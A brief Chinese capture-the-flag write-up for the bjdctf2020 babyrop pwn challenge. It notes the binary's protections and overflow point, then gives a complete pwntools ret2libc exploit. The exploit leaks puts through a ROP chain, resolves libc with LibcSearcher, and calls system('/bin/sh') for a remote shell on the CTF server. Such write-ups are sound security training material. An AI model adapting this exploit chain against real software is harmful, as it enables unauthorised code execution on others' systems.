0x1 checksec
只有NX保护
0x2 IDA
溢出点
没有其它有用的函数,考虑用ret2libc3,另外需注意是64位传参及寄存器的使用
ret2libc3也是经典的例题了
0x3 EXP
from pwn import *
from LibcSearcher import *
#p=process("./bjdctf")
p=remote("node4.buuoj.cn",28450)
elf=ELF("./22bjdctf2020babyrop")
puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]
p.recvuntil(b"story!\n")
pop_rdi_ret=0x400733
start=0x400530
ret=0x400734
payload1=b"A"*(0x28)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
p.sendline(payload1)
#puts=u64(p.recvline()[:-1].ljust(8,b'\x00'))
puts=u64(p.recv(6).ljust(8,b'\x00'))
libc=LibcSearcher("puts",puts)
libcbase=puts-libc.dump("puts")
system=libcbase+libc.dump("system")
str_bin_sh=libcbase+libc.dump("str_bin_sh")
payload2=b"A"*(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system)
p.recvuntil(b"story!\n")
p.sendline(payload2)
p.interactive()